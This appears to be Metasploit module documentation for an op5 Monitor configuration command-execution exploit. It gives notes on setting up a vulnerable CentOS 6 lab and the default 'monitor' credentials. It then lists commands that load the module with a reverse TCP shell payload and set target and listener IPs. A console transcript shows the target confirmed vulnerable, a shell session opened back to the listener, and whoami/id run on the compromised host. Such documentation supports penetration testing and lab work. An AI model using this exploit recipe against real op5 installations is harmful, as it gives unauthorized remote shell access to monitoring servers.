Vulnerable Application
- Official Source: op5.com
- Archived Copy: github
Creating A Testing Environment
Just a few quick notes on setting up a vulnerable lab with this software.
- The vulnerable version only installs on CentOS 6.x (author used 6.0 final)
- Within php.ini, change date.timezone = "America/New York" to date.timezone = "America/New_York" if you get PHP errors
- You may need to register for a free license via an email challenge/verification
Verification Steps
- Install the software, RHEL/CENTOS required (tested on CentOS 6)
- Start msfconsole
- Do: use exploit/linux/http/op5_config_exec
- Do: set payload linux/x86/shell/reverse_tcp
- Do: set rhost 192.168.2.31
- Do: set lhost 192.168.2.229
- Do: exploit
- You should get a shell.
Options
PASSWORD
Password is 'monitor' by default.
USERNAME
Documentation was unclear on this. When installing just the app, the username was 'monitor' by default. However, it looks like if you install the appliance it may be 'root'.
Scenarios
msf > use exploit/linux/http/op5_config_exec
msf exploit(op5_config_exec) > set verbose true
verbose => true
msf exploit(op5_config_exec) > set payload linux/x86/shell/reverse_tcp
payload => linux/x86/shell/reverse_tcp
msf exploit(op5_config_exec) > set rhost 192.168.2.31
rhost => 192.168.2.31
msf exploit(op5_config_exec) > set lhost 192.168.2.229
lhost => 192.168.2.229
msf exploit(op5_config_exec) > check
[+] Version Detected: 7.1.9
[+] The target is vulnerable.
msf exploit(op5_config_exec) > exploit
[*] Started reverse TCP handler on 192.168.2.229:4444
[*] Sending stage (36 bytes) to 192.168.2.31
[*] Command shell session 1 opened (192.168.2.229:4444 -> 192.168.2.31:52552) at 2016-06-01 14:38:41 -0400
[*] Command Stager progress - 100.00% done (832/832 bytes)
whoami
monitor
id
uid=299(monitor) gid=48(apache) groups=48(apache),14(uucp),488(smstools) context=system_u:system_r:initrc_t:s0